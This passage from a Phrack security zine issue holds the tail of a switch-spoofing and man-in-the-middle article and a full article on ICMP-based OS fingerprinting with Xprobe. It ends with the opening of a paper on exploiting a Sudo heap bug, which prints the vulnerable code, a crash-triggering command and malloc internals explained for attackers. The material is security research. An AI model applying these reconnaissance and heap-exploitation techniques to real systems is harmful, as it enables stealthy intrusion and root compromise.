if_ethersubr.c.patch and then rebuild your kernel Switchtest ---------- Switchtest was written during the development of Taranis. It is included in case someone wants to test their switches and ip stacks. We weren't able to find a switch that defaulted to hub mode when confronted with lots of packets with random source ethernet addresses. Maybe someone else will. It also tries a man in the middle attack. This shouldn't work as it is based on resending traffic to ethernet broadcast or ethernet multicast addresses. If a target IP stack is vulnerable, I'd like to hear about it. We had discussed the possibility of a generalized man in the middle attack. It is postulated that you could do a decent job of the attack by redirecting traffic for a while, and queueing the packets, then resetting the switch (with an arp request) and then sending the queued packets, then redirecting again. This will probably cause a lot of packet drops, but tcp applications may be able to continue in the face of this.. FAQ --- Q: Where does the name come from? A: Taranis was the name of a god in ancient Gaul. Whenever I can't think of a name I randomly grab something from www.pantheon.org. Q: Why do I keep getting PCAP open errors? A: You're not root or your kernel doesn't have a pcap compatible way of capturing packets. Perhaps your network is not ethernet. Q: Why am I not seeing packets from the target machine? A: There are several possibilities: 1. Your system is not spoofing ethernet traffic. Check the output with ethereal (http://ethereal.zing.org/) or tcpdump (www.tcpdump.org) If you are using tcpdump use the -e flag to display the link level addresses 2. If the system you are on is spoofing the ethernet frames correctly it is possible that the switch has a delay before it will switch the port associated with an ethernet address. Some switches also have a lock in mode, where they will not accept any changes to their CAM table. Q: Did [insert network type here] really look like that? A: No. But I have no ascii graphics skills. When I get a chance I'll track down some real pictures and post them at: www.bitland.net/taranis/diagrams.html |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x07 of 0x12 |=---=[ ICMP based remote OS TCP/IP stack fingerprinting techniques ]=---=| |=-----------------------------------------------------------------------=| |=---------------=[ Ofir Arkin & Fyodor Yarochkin ]=---------------------=| --[ICMP based fingerprinting approach]-- TCP based remote OS fingerprinting is quite old(*1) and well-known these days, here we would like to introduce an alternative method to determine an OS remotely based on ICMP responses which are received from the host. Certain accuracy level has been achieved with different platforms, which, with some systems or or classes of platforms (i.g. Win*), is significally more precise than demonstrated with TCP based fingerprinting methods. As mentioned above TCP based method, ICMP fingerprinting utilizes several tests to perform remote OS TCP/IP stack probe, but unlike TCP fingerprinting, a number of tests required to identify an OS could vary from 1 to 4 (as of current development stage). ICMP fingerprinting method is based on certain discoveries on differencies of ICMP replies from various operating systems (mostly due to incorrect, or inconsistant implementation), which were found by Ofir Arkin during his "ICMP Usage in Scanning" research project. Later these discoveries were summarised into a logical desicions tree which Ofir entitled "X project" and practically implemented in 'Xprobe' tool. --[Information/Noise ratio with ICMP fingerprints]-- As it's been noted, the number of datagrams we need to send and receive in order to remotely fingerprint a targeted machine with ICMP based probes is small. Very small. In fact we can send one datagram and receive one reply and this will help us identify up to eight different operating systems (or classes of operating systems). The maximum datagrams which our tool will use at the current stage of development, is four. This is the same number of replies we will need to analyse. This makes ICMP based fingerprinting very time-efficient. ICMP based probes could be crafted to be very stealthy. As on the moment, no maliformed/broken/corrupted datagrams are used to identify remote OS type, unlike the common fingerprinting methods. Current core analysis targets validation of received ICMP responses on valid packets, rather than crafting invalid packets themselves. Heaps of such packets appear in an average network on daily basis and very few IDS systems are tuned to detect such traffic (and those which are, presumably are very noisy and badly configured). --[Why it still works?]-- Inheritable mess among various TCP/IP stack implementations with ICMP handling implementations which implement different RFC standards (original RFC 792, additional RFC 1122, etc), partial or incomplete ICMP support (various ICMP requests are not supported everywhere), low significance of ICMP Error messages data (who verifies all the fields of the original datagram?!), mistakes and misunderstanding in ICMP protocol implementation made our method viable. --[What do we fingerprint:]-- Several OS-specific differencies are being utilized in ICMP based fingerprinting to identify remote operating system type: IP fields of an 'offending' datagram to be examined: * IP total length field Some operating systems (i.g. BSD family) will add 20 bytes (sizeof(ipheader)) to the original IP total length field (which occures due to internal processing mistakes of the datagram, please note when the same packet is read from SOCK_RAW the same behaviour is seen: returned packet ip_len fiend is off by 20 bytes). Some other operating systems will decrease 20 bytes from the original IP total lenth field value of the offending packet. Third group of systems will echo this field correctly. * IP ID some systems are seen not to echo this field correctly. (bit order of the field is changed). * 3 bits flags and offset some systems are seen not to echo this field correctly. (bit order of the field is changed). * IP header checksum Some operating systems will miscalculate this field, others just zero it out. Third group of the systems echoes this field correctly. * UDP header checksum (in case of UDP datagram) The same thing could happen with UDP checksum header. IP headers of responded ICMP packet: * Precedence bits Each IP Datagram has an 8-bit field called the 'TOS Byte', which represents the IP support for prioritization and Type-of-Service handling. The 'TOS Byte' consists of three fields. The 'Precedence field'\cite{rfc791}, which is 3-bit long, is intended to prioritize the IP Datagram. It has eight levels of prioritization. Higher priority traffic should be sent before lower priority traffic. The second field, 4 bits long, is the 'Type-of-Service' field. It is intended to describe how the network should make tradeoffs between throughput, delay, reliability, and cost in routing an IP Datagram. The last field, the 'MBZ' (must be zero), is unused and must be zero. Routers and hosts ignore this last field. This field is 1 bit long. The TOS Bits and MBZ fields are being replaced by the DiffServ mechanism for QoS. RFC 1812 Requires following for IP Version 4 Routers: "4.3.2.5 TOS and Precedence ICMP Source Quench error messages, if sent at all, MUST have their IP Precedence field set to the same value as the IP Precedence field in the packet that provoked the sending of the ICMP Source Quench message. All other ICMP error messages (Destination Unreachable, Redirect, Time Exceeded, and Parameter Problem) SHOULD have their precedence value set to 6 (INTERNETWORK CONTROL) or 7 (NETWORK CONTROL). The IP Precedence value for these error messages MAY be settable". Linux Kernel 2.0.x, 2.2.x, 2.4.x will act as routers and will set their Precedence bits field value to 0xc0 with ICMP error messages. Networking devices that will act the same will be Cisco routers based on IOS 11.x-12.x and Foundry Networks switches. * DF bits echoing Some TCP/IP stacks will echo DF bit with ICMP Error datagrams, others (like linux) will copy the whole octet completely, zeroing certain bits, others will ignore this field and set their own. * IP ID filend (linux 2.4.0 - 2.4.4 kernels) Linux machines based on Kernel 2.4.0-2.4.4 will set the IP Identification field value with their ICMP query request and reply messages to a value of zero. This was later fixed with Linux Kernels 2.4.5 and up. * IP ttl field (ttl distance to the target has to be precalculated to guarantee accuracy). "The sender sets the time to live field to a value that represents the maximum time the datagram is allowed to travel on the Internet". The field value is decreased at each point that the IP header is being processed. RFC 791 states that this field decreasement reflects the time spent processing the datagram. The field value is measured in units of seconds. The RFC also states that the maximum time to live value can be set to 255 seconds, which equals to 4.25 minutes. The datagram must be discarded if this field value equals zero - before reaching its destination. Relating to this field as a measure to assess time is a bit misleading. Some routers may process the datagram faster than a second, and some may process the datagram longer than a second. The real intention is to have an upper bound to the datagram lifetime, so infinite loops of undelivered datagrams will not jam the Internet. Having a bound to the datagram lifetime help us to prevent old duplicates to arrive after a certain time elapsed. So when we retransmit a piece of information which was not previously delivered we can be assured that the older duplicate is already discarded and will not interfere with the process. The IP TTL field value with ICMP has two separate values, one for ICMP query messages and one for ICMP query replies. The IP TTL field value helps us identify certain operating systems and groups of operating systems. It also provides us with the simplest means to add another check criterion when we are querying other host(s) or listening to traffic (sniffing). TTL-based fingeprinting requires a TTL distance to the done to be precalculated in advance (unless a fingerprinting of a local network based system is performed system). The ICMP Error messages will use values used by ICMP query request messages. A good statistics of ttl dependancy on OS type has been gathered at: http://www.switch.ch/docs/ttl_default.html (Research paper on default ttl values) * TOS field RFC 1349 defines the usage of the Type-of-Service field with the ICMP messages. It distinguishes between ICMP error messages (Destination Unreachable, Source Quench, Redirect, Time Exceeded, and Parameter Problem), ICMP query messages (Echo, Router Solicitation, Timestamp, Information request, Address Mask request) and ICMP reply messages (Echo reply, Router Advertisement, Timestamp reply, Information reply, Address Mask reply). Simple rules are defined: * An ICMP error message is always sent with the default TOS (0x0000) * An ICMP request message may be sent with any value in the TOS field. "A mechanism to allow the user to specify the TOS value to be used would be a useful feature in many applications that generate ICMP request messages". The RFC further specify that although ICMP request messages are normally sent with the default TOS, there are sometimes good reasons why they would be sent with some other TOS value. * An ICMP reply message is sent with the same value in the TOS field as was used in the corresponding ICMP request message. Some operating systems will ignore RFC 1349 when sending ICMP echo reply messages, and will not send the same value in the TOS field as was used in the corresponding ICMP request message. ICMP headers of responded ICMP packet: * ICMP Error Message Quoting Size: All ICMP error messages consist of an IP header, an ICMP header and certain amount of data of the original datagram, which triggered the error (aka offending datagram). According to RFC 792 only 64 bits (8 octets) of original datagram are supposed to be included in the ICMP error message. However RFC 1122 (issued later) recommends up to 576 octets to be quoted. Most of "older" TCP stack implementations will include 8 octets into ICMP Errror message. Linux/HPUX 11.x, Solaris, MacOS and others will include more. Noticiably interesting is the fact that Solaris engineers probably couldn't not read RFC properly (since instead of 64 bits Solaris 2.x includes 64 octets (512 bits) of the original datagram. * ICMP error Message echoing integrity Another artifact which has been noticed is that some stack implementations, when sending back an ICMP error message, may alter the offending packet's IP header and the underlying protocol data, which is echoed back with the ICMP error message. Since mistakes, made by TCP/IP stack programmers are different and specific to an operating system, an analysis of these mistakes could give a potential attacker a a possibilty to make assumptions about the target operating system type. Additional tweaks and twists: * Using difererent from zero code fields in ICMP echo requests When an ICMP code field value different than zero (0) is sent with an ICMP Echo request message (type 8), operating systems that will answer our query with an ICMP Echo reply message that are based on one of the Microsoft based operating systems will send back an ICMP code field value of zero with their ICMP Echo Reply. Other operating systems (and networking devices) will echo back the ICMP code field value we were using with the ICMP Echo Request. The Microsoft based operating systems acts in contrast to RFC 792 guidelines which instruct the answering operating systems to only change the ICMP type to Echo reply (type 0), recalculate the checksums and send the ICMP Echo reply away. * Using DF bit echoing with ICMP query messages As in case of ICMP Error messages, some tcp stacks will respond these queries, while the others: will not. * Other ICMP messages: * ICMP timestamp request * ICMP Information request * ICMP Address mask request Some TCP/IP stacks support these messages and respond to some of these requests. --[Xprobe implementation]-- Currently Xprobe deploys hardcoded logic tree, developed by Ofir Arkin in 'Project X'. Initially a UDP datagram is being sent to a closed port in order to trigger ICMP Error message: ICMP unreachable/port unreach. (this sets up a limitation of having at least one port not filtered on target system with no service running, generically speaking other methods of triggering ICMP unreach packet could be used, this will be discussed further). Moreover, a few tests (icmp unreach content, DF bits, TOS ...) could be combined within a single query, since they do not affect results of each other. Upon the receipt of ICMP unreachable datagram, contents of the received datagram is examined and a diagnostics decision is made, if any further tests are required, according to the logic tree, further queries are sent. --[ Logic tree]--- Quickly recapping the logic tree organization: Initially all TCP/IP stack implementations are split into 2 groups, those which echo precedence bits back, and those which do not. Those which do echo precendence bits (linux 2.0.x, 2.2.x, 2.4.x, cisco IOS 11.x-12.x, Extreme Network Switches etc), being differentiated further based on ICMP error quoting size. (Linux sticks with RFC 1122 here and echoes up to 576 octets, while others in this subgroup echo only 64 bits (8 octets)). Further echo integrity checks are used to differentiate cisco routers from Extreme Network switches. Time-to-live and IP ID fields of ICMP echo reply are being used to recognize version of linux kernel. The same approach is being used to recognize other TCP/IP stacks. Data echoing validation (amounts of octets of original datagram echoed, checksum validation, etc). If additional information is needed to differ two 'similar' IP stacks, additional query is being sent. (please refer to the diagram at http://www.sys-security.com/html/projects/X.html for more detailed explanation/graphical representation of the logic tree). One of the serious problems with the logic tree, is that adding new operating system types to it becomes extremely painful. At times part of the whole logic tree has to be reworked to 'fit' a single description. Therefore a singature based fingerprinting method took our closer attention. --[Sinature based approach]-- Singature based approach is what we are currently focusing on and which we believe will be further, more stable, reliable and flexible method of remote ICMP based fingerprints. Signature-based method is currently based on five different tests, which optionally could be included in each operating system fingerprint. Initally the systems with lesser amount of tests are being examined (normally starting with ICMP unreach test). If no single OS stack found matching received signature, those stacks which match a part, being grouped again, and another test (based on lesser amounts of tests issued principle) is choosen and executed. This verification is repeated until an OS stack, completely matching the signature is found, or we run out of tests. Currently following tests are being deployed: * ICMP unreachable test (udp closed port based, host unreachable, network unreachable (for systems which are believed to be gateways) * ICMP echo request/reply test * ICMP timestamp request * ICMP information request * ICMP address mask request --[future implementations/development]-- Following issues are planned to be deployed (we always welcome discussions/suggestions though): * Fingerprints database (currently being tested) * Dynamic, AI based logic (long-term project :)) * Tests would heavily dependent on network topology (pre-test network mapping will take place). * Path-to-target test (to calculate hops distance to the target) filtering devices probes. * Future implementations will be using packets with actual application data to dismiss chances of being detected. * other network mapping capabilities shall be included ( network role identification, search for closed UDP port, reachability tests, etc). --[code for kids]-- Currently implemented code and further documentation is available at following locations: http://www.sys-security.com/html/projects/X.html http://xprobe.sourceforge.net http://www.notlsd.net/xprobe/ Ofir Arkin Fyodor Yarochkin |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x08 of 0x12 --=[ Disclaimer ]=-----------------------------------------------------// In this issue of Phrack, there are two similar articles about malloc based exploitation techniques. The first one explains in detail the GNU C Library implementation of the malloc interface and how it can be abused to exploit buffer overflows in malloc space. The second article is a more hands-on approach to introduce you to the idea of malloc overflows. It covers the System V implementation and the GNU C Library implementation. If you are not sure about the topic, it may be a better choice to start with it to get an idea of the subject. However, if you are serious about learning this technique, there is no way around the article by MaXX. --=[ Enjoy ]=------------------------------------------------------------// |=[ Vudo - An object superstitiously believed to embody magical powers ]=-| |=-----------------------------------------------------------------------=| |=------------=[ Michel "MaXX" Kaempf ]=-------------=| |=---------------[ Copyright (C) 2001 Synnergy Networks ]=---------------=| The present paper could probably have been entitled "Smashing The Heap For Fun And Profit"... indeed, the memory allocator used by the GNU C Library (Doug Lea's Malloc) and the associated heap corruption techniques are presented. However, it was entitled "Vudo - An object superstitiously believed to embody magical powers" since a recent Sudo vulnerability and the associated Vudo exploit are presented as well. --[ Contents ]---------------------------------------------------------- 1 - Introduction 2 - The "potential security problem" 2.1 - A real problem 2.1.1 - The vulnerable function 2.1.2 - The segmentation violation 2.2 - An unreal exploit 2.3 - Corrupting the heap 2.4 - Temporary conclusion 3 - Doug Lea's Malloc 3.1 - A memory allocator 3.1.1 - Goals 3.1.2 - Algorithms 3.1.2.1 - Boundary tags 3.1.2.2 - Binning 3.1.2.3 - Locality preservation 3.1.2.4 - Wilderness preservation 3.1.2.5 - Memory mapping 3.2 - Chunks of memory 3.2.1 - Synopsis of public routines 3.2.2 - Vital statistics 3.2.3 - Available chunks 3.3 - Boundary tags 3.3.1 - Structure 3.3.2 - Size of a chunk 3.3.3 - prev_size field 3.3.4 - size field 3.4 - Bins 3.4.1 - Indexing into bins 3.4.2 - Linking chunks in bin lists 3.5 - Main public routines 3.5.1 - The malloc(3) algorithm 3.5.2 - The free(3) algorithm 3.5.3 - The realloc(3) algorithm 3.6 - Execution of arbitrary code 3.6.1 - The unlink() technique 3.6.1.1 - Concept 3.6.1.2 - Proof of concept 3.6.2 - The frontlink() technique 3.6.2.1 - Concept 3.6.2.2 - Proof of concept 4 - Exploiting the Sudo vulnerability 4.1 - The theory 4.2 - The practice 5 - Acknowledgements 6 - Outroduction --[ 1 - Introduction ]-------------------------------------------------- Sudo (superuser do) allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while logging the commands and arguments. -- http://www.courtesan.com/sudo/index.html On February 19, 2001, Sudo version 1.6.3p6 was released: "This fixes a potential security problem. So far, the bug does not appear to be exploitable." Despite the comments sent to various security mailing lists after the announce of the new Sudo version, the bug is not a buffer overflow and the bug does not damage the stack. But the bug is exploitable: even a single byte located somewhere in the heap, erroneously overwritten by a NUL byte before a call to syslog(3) and immediately restored after the syslog(3) call, may actually lead to execution of arbitrary code as root. Kick off your shoes, put your feet up, lean back and just enjoy the... voodoo. The present paper focuses on Linux/Intel systems and: - details the aforementioned bug and explains why a precise knowledge of how malloc works internally is needed in order to exploit it; - describes the functioning of the memory allocator used by the GNU C Library (Doug Lea's Malloc), from the attacker's point of view; - applies this information to the Sudo bug, and presents a working exploit for Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1. --[ 2 - The "potential security problem" ]------------------------------ ----[ 2.1 - A real problem ]-------------------------------------------- ------[ 2.1.1 - The vulnerable function ]------------------------------- The vulnerable function, do_syslog(), can be found in the logging.c file of the Sudo tarball. It is called by two other functions, log_auth() and log_error(), in order to syslog allow/deny and error messages. If the message is longer than MAXSYSLOGLEN (960) characters, do_syslog() splits it into parts, breaking up the line into what will fit on one syslog line (at most MAXSYSLOGLEN characters) and trying to break on a word boundary if possible (words are delimited by SPACE characters here). /* * Log a message to syslog, pre-pending the username and splitting the * message into parts if it is longer than MAXSYSLOGLEN. */ static void do_syslog( int pri, char * msg ) { int count; char * p; char * tmp; char save; /* * Log the full line, breaking into multiple syslog(3) calls if * necessary */ [1] for ( p=msg, count=0; count < strlen(msg)/MAXSYSLOGLEN + 1; count++ ) { [2] if ( strlen(p) > MAXSYSLOGLEN ) { /* * Break up the line into what will fit on one syslog(3) line * Try to break on a word boundary if possible. */ [3] for ( tmp = p + MAXSYSLOGLEN; tmp > p && *tmp != ' '; tmp-- ) ; if ( tmp <= p ) [4] tmp = p + MAXSYSLOGLEN; /* NULL terminate line, but save the char to restore later */ save = *tmp; [5] *tmp = '\0'; if ( count == 0 ) SYSLOG( pri, "%8.8s : %s", user_name, p ); else SYSLOG( pri,"%8.8s : (command continued) %s",user_name,p ); /* restore saved character */ [6] *tmp = save; /* Eliminate leading whitespace */ [7] for ( p = tmp; *p != ' '; p++ ) ; [8] } else { if ( count == 0 ) SYSLOG( pri, "%8.8s : %s", user_name, p ); else SYSLOG( pri,"%8.8s : (command continued) %s",user_name,p ); } } } ------[ 2.1.2 - The segmentation violation ]---------------------------- Chris Wilson discovered that long command line arguments cause Sudo to crash during the do_syslog() operation: $ /usr/bin/sudo /bin/false `/usr/bin/perl -e 'print "A" x 31337'` Password: maxx is not in the sudoers file. This incident will be reported. Segmentation fault Indeed, the loop[7] does not check for NUL characters and therefore pushes p way after the end of the NUL terminated character string msg (created by log_auth() or log_error() via easprintf(), a wrapper to vasprintf(3)). When p reaches the end of the heap (msg is of course located in the heap since vasprintf(3) relies on malloc(3) and realloc(3) to allocate dynamic memory) Sudo eventually dies on line[7] with a segmentation violation after an out of-bounds read operation. This segmentation fault occurs only when long command line arguments are passed to Sudo because the loop[7] has to be run many times in order to reach the end of the heap (there could indeed be many SPACE characters, which force do_syslog() to leave the loop[7], after the end of the msg buffer but before the end of the heap). Consequently, the length of the msg string has to be many times MAXSYSLOGLEN because the loop[1] runs as long as count does not reach (strlen(msg)/MAXSYSLOGLEN + 1). ----[ 2.2 - An unreal exploit ]----------------------------------------- Dying after an illegal read operation is one thing, being able to perform an illegal write operation in order to gain root privileges is another. Unfortunately do_syslog() alters the heap at two places only: line[5] and line[6]. If do_syslog() erroneously overwrites a character at line[5], it has to be exploited during one of the syslog(3) calls between line[5] and line[6], because the erroneously overwritten character is immediately restored at line[6]. Since msg was allocated in the heap via malloc(3) and realloc(3), there is an interesting structure stored just after the end of the msg buffer, maintained internally by malloc: a so-called boundary tag. If syslog(3) uses one of the malloc functions (calloc(3), malloc(3), free(3) or realloc(3)) and if the Sudo exploit corrupts that boundary tag during the execution of do_syslog(), evil things could happen. But does syslog(3) actually call malloc functions? $ /usr/bin/sudo /bin/false `/usr/bin/perl -e 'print "A" x 1337'` [...] malloc( 100 ): 0x08068120; malloc( 300 ): 0x08060de0; free( 0x08068120 ); malloc( 700 ): 0x08060f10; free( 0x08060de0 ); malloc( 1500 ): 0x080623b0; free( 0x08060f10 ); realloc( 0x080623b0, 1420 ): 0x080623b0; [...] malloc( 192 ): 0x08062940; malloc( 8192 ): 0x080681c8; realloc( 0x080681c8, 119 ): 0x080681c8; free( 0x08062940 ); free( 0x080681c8 ); [...] The first series of malloc calls was performed by log_auth() in order to allocate memory for the msg buffer, but the second series of malloc calls was performed... by syslog(3). Maybe the Sudo exploit is not that unreal after all. ----[ 2.3 - Corrupting the heap ]--------------------------------------- However, is it really possible to alter a given byte of the boundary tag located after the msg buffer (or more generally to overwrite at line[5] an arbitrary character (after the end of msg) with a NUL byte)? If the Sudo exploit exclusively relies on the content of the msg buffer (which is fortunately composed of various user-supplied strings (current working directory, sudo command, and so on)), the answer is no. This assertion is demonstrated below. The character overwritten at line[5] by a NUL byte is pointed to by tmp: - tmp comes from loop[3] if there is a SPACE character among the first MAXSYSLOGLEN bytes after p. tmp then points to the first SPACE character encountered when looping from (p + MAXSYSLOGLEN) down to p. -- If the overwritten SPACE character is located within the msg buffer, there is no heap corruption at all because the write operation is not an illegal one. -- If this first encountered SPACE character is located outside the msg buffer, the Sudo exploit cannot control its exact position if it solely relies on the content of the msg buffer, and thus cannot control where the NUL byte is written. - tmp comes from line[4] if there is no SPACE character among the first MAXSYSLOGLEN bytes after p. tmp is then equal to (p + MAXSYSLOGLEN). -- If p and tmp are both located within the msg buffer, there is no possible memory corruption, because overwriting the tmp character located within a buffer returned by malloc is a perfectly legal action. -- If p is located within the msg buffer and tmp is located outside the msg buffer... this is impossible because the NUL terminator at the end of the msg buffer, placed between p and tmp, prevents do_syslog() from successfully passing the test[2] (and the code at line[8] is not interesting because it performs no write operation). Moreover, if the test[2] fails once it will always fail, because p will never be modifed again and strlen(p) will therefore stay less than or equal to MAXSYSLOGLEN, forcing do_syslog() to run the code at line[8] again and again, as long as count does not reach (strlen(msg)/MAXSYSLOGLEN + 1). -- If p and tmp are both located outside the msg buffer, p points to the first SPACE character encountered after the end of the msg string because it was pushed outside the msg buffer by the loop[7]. If the Sudo exploit exclusively relies on the content of the msg buffer, it cannot control p because it cannot control the occurrence of SPACE characters after the end of the msg string. Consequently, it cannot control tmp, which points to the place where the NUL byte is written, because tmp depends on p. Moreover, after p was pushed outside the msg buffer by the loop[7], there should be no NUL character between p and (p + MAXSYSLOGLEN) in order to successfully pass the test[2]. The Sudo exploit should once again rely on the content of the memory after msg. ----[ 2.4 - Temporary conclusion ]-------------------------------------- The Sudo exploit should: - overwrite a byte of the boundary tag located after the msg buffer with the NUL byte... it should therefore control the content of the memory after msg (managed by malloc) because, as proven in 2.3, the control of the msg buffer itself is not sufficient; - take advantage of the erroneously overwritten byte before it is restored... one of the malloc calls performed by syslog(3) should therefore read the corrupted boundary tag and further alter the usual execution of Sudo. But in order to be able to perform these tasks, an in depth knowledge of how malloc works internally is needed. --[ 3 - Doug Lea's Malloc ]--------------------------------------------- Doug Lea's Malloc (or dlmalloc for short) is the memory allocator used by the GNU C Library (available in the malloc directory of the library source tree). It manages the heap and therefore provides the calloc(3), malloc(3), free(3) and realloc(3) functions which allocate and free dynamic memory. The description below focuses on the aspects of dlmalloc needed to successfully corrupt the heap and subsequently exploit one of the malloc calls in order to execute arbitrary code. A more complete description is available in the GNU C Library source tree and at the following addresses: ftp://gee.cs.oswego.edu/pub/misc/malloc.c http://gee.cs.oswego.edu/dl/html/malloc.html ----[ 3.1 - A memory allocator ]---------------------------------------- "This is not the fastest, most space-conserving, most portable, or most tunable malloc ever written. However it is among the fastest while also being among the most space-conserving, portable and tunable. Consistent balance across these factors results in a good general-purpose allocator for malloc-intensive programs." ------[ 3.1.1 - Goals ]------------------------------------------------- The main design goals for this allocator are maximizing compatibility, maximizing portability, minimizing space, minimizing time, maximizing tunability, maximizing locality, maximizing error detection, minimizing anomalies. Some of these design goals are critical when it comes to damaging the heap and exploiting malloc calls afterwards: - Maximizing portability: "conformance to all known system constraints on alignment and addressing rules." As detailed in 3.2.2 and 3.3.2, 8 byte alignment is currently hardwired into the design of dlmalloc. This is one of the main characteristics to permanently keep in mind. - Minimizing space: "The allocator [...] should maintain memory in ways that minimize fragmentation -- holes in contiguous chunks of memory that are not used by the program." But holes are sometimes needed in order to successfully attack programs which corrupt the heap (Sudo for example). - Maximizing tunability: "Optional features and behavior should be controllable by users". Environment variables like MALLOC_TOP_PAD_ alter the functioning of dlmalloc and could therefore aid in exploiting malloc calls. Unfortunately they are not loaded when a SUID or SGID program is run. - Maximizing locality: "Allocating chunks of memory that are typically used together near each other." The Sudo exploit for example heavily relies on this feature to reliably create holes in the memory managed by dlmalloc. - Maximizing error detection: "allocators should provide some means for detecting corruption due to overwriting memory, multiple frees, and so on." Luckily for the attacker who smashes the heap in order to execute arbitrary code, the GNU C Library does not activate these error detection mechanisms (the MALLOC_DEBUG compile-time option and the malloc debugging hooks (__malloc_hook, __free_hook, etc)) by default. ------[ 3.1.2 - Algorithms ]-------------------------------------------- "While coalescing via boundary tags and best-fit via binning represent the main ideas of the algorithm, further considerations lead to a number of heuristic improvements. They include locality preservation, wilderness preservation, memory mapping". --------[ 3.1.2.1 - Boundary tags ]------------------------------------- The chunks of memory managed by Doug Lea's Malloc "carry around with them size information fields both before and after the chunk. This allows for two important capabilities: - Two bordering unused chunks can be coalesced into one larger chunk. This minimizes the number of unusable small chunks. - All chunks can be traversed starting from any known chunk in either a forward or backward direction." The presence of such a boundary tag (the structure holding the said information fields, detailed in 3.3) between each chunk of memory comes as a godsend to the attacker who tries to exploit heap mismanagement. Indeed, boundary tags are control structures located in the very middle of a potentially corruptible memory area (the heap), and if the attacker manages to trick dlmalloc into processing a carefully crafted fake (or altered) boundary tag, they should be able to eventually execute arbitrary code. For example, the attacker could overflow a buffer dynamically allocated by malloc(3) and overwrite the next contiguous boundary tag (Netscape browsers exploit), or underflow such a buffer and overwrite the boundary tag stored just before (Secure Locate exploit), or cause the vulnerable program to perform an incorrect free(3) call (LBNL traceroute exploit) or multiple frees, or overwrite a single byte of a boundary tag with a NUL byte (Sudo exploit), and so on: http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt ftp://maxx.via.ecp.fr/dislocate/ http://www.synnergy.net/downloads/exploits/traceroute-exp.txt ftp://maxx.via.ecp.fr/traceroot/ --------[ 3.1.2.2 - Binning ]------------------------------------------- "Available chunks are maintained in bins, grouped by size." Depending on its size, a free chunk is stored by dlmalloc in the bin corresponding to the correct size range (bins are detailed in 3.4): - if the size of the chunk is 200 bytes for example, it is stored in the bin that holds the free chunks whose size is exactly 200 bytes; - if the size of the chunk is 1504 bytes, it is stored in the bin that holds the free chunks whose size is greater than or equal to 1472 bytes but less than 1536; - if the size of the chunk is 16392 bytes, it is stored in the bin that holds the free chunks whose size is greater than or equal to 16384 bytes but less than 20480; - and so on (how these ranges are computed and how the correct bin is chosen is detailed in 3.4.1). "Searches for available chunks are processed in smallest-first, best-fit order. [...] Until the versions released in 1995, chunks were left unsorted within bins, so that the best-fit strategy was only approximate. More recent versions instead sort chunks by size within bins, with ties broken by an oldest-first rule." These algorithms are implemented via the chunk_alloc() function (called by malloc(3) for example) and the frontlink() macro, detailed in 3.5.1 and 3.4.2. --------[ 3.1.2.3 - Locality preservation ]----------------------------- "In the current version of malloc, a version of next-fit is used only in a restricted context that maintains locality in those cases where it conflicts the least with other goals: If a chunk of the exact desired size is not available, the most recently split-off space is used (and resplit) if it is big enough; otherwise best-fit is used." This characteristic, implemented within the chunk_alloc() function, proved to be essential to the Sudo exploit. Thanks to this feature, the exploit could channel a whole series of malloc(3) calls within a particular free memory area, and could therefore protect another free memory area that had to remain untouched (and would otherwise have been allocated during the best-fit step of the malloc algorithm). --------[ 3.1.2.4 - Wilderness preservation ]--------------------------- "The wilderness (so named by Kiem-Phong Vo) chunk represents the space bordering the topmost address allocated from the system. Because it is at the border, it is the only chunk that can be arbitrarily extended (via sbrk in Unix) to be bigger than it is (unless of course sbrk fails because all memory has been exhausted). One way to deal with the wilderness chunk is to handle it about the same way as any other chunk. [...] A better strategy is currently used: treat the wilderness chunk as bigger than all others, since it can be made so (up to system limitations) and use it as such in a best-first scan. This results in the wilderness chunk always being used only if no other chunk exists, further avoiding preventable fragmentation." The wilderness chunk is one of the most dangerous opponents of the attacker who tries to exploit heap mismanagement. Because this chunk of memory is handled specially by the dlmalloc internal routines (as detailed in 3.5), the attacker will rarely be able to execute arbitrary code if they solely corrupt the boundary tag associated with the wilderness chunk. --------[ 3.1.2.5 - Memory mapping ]------------------------------------ "In addition to extending general-purpose allocation regions via sbrk, most versions of Unix support system calls such as mmap that allocate a separate non-contiguous region of memory for use by a program. This provides a second option within malloc for satisfying a memory request. [...] the current version of malloc relies on mmap only if (1) the request is greater than a (dynamically adjustable) threshold size (currently by default 1MB) and (2) the space requested is not already available in the existing arena so would have to be obtained via sbrk." For these two reasons, and because the environment variables that alter the behavior of the memory mapping mechanism (MALLOC_MMAP_THRESHOLD_ and MALLOC_MMAP_MAX_) are not loaded when a SUID or SGID program is run, a perfect knowledge of how the memory mapping feature works is not mandatory when abusing malloc calls. However, it will be discussed briefly in 3.3.4 and 3.5. ----[ 3.2 - Chunks of memory ]------------------------------------------ The heap is divided by Doug Lea's Malloc into contiguous chunks of memory. The heap layout evolves when malloc functions are called (chunks may get allocated, freed, split, coalesced) but all procedures maintain the invariant that no free chunk physically borders another one (two bordering unused chunks are always coalesced into one larger chunk). ------[ 3.2.1 - Synopsis of public routines ]--------------------------- The chunks of memory managed by dlmalloc are allocated and freed via four main public routines: - "malloc(size_t n); Return a pointer to a newly allocated chunk of at least n bytes, or null if no space is available." The malloc(3) routine relies on the internal chunk_alloc() function mentioned in 3.1.2 and detailed in 3.5.1. - "free(Void_t* p); Release the chunk of memory pointed to by p, or no effect if p is null." The free(3) routine depends on the internal function chunk_free() presented in 3.5.2. - "realloc(Void_t* p, size_t n); Return a pointer to a chunk of size n that contains the same data as does chunk p up to the minimum of (n, p's size) bytes, or null if no space is available. The returned pointer may or may not be the same as p. If p is null, equivalent to malloc. Unless the #define REALLOC_ZERO_BYTES_FREES below is set, realloc with a size argument of zero (re)allocates a minimum-sized chunk." realloc(3) calls the internal function chunk_realloc() (detailed in 3.5.3) that once again relies on chunk_alloc() and chunk_free(). As a side note, the GNU C Library defines REALLOC_ZERO_BYTES_FREES, so that realloc with a size argument of zero frees the allocated chunk p. - "calloc(size_t unit, size_t quantity); Returns a pointer to quantity * unit bytes, with all locations set to zero." calloc(3) behaves like malloc(3) (it calls chunk_alloc() in the very same manner) except that calloc(3) zeroes out the allocated chunk before it is returned to the user. calloc(3) is therefore not discussed in the present paper. ------[ 3.2.2 - Vital statistics ]-------------------------------------- When a user calls 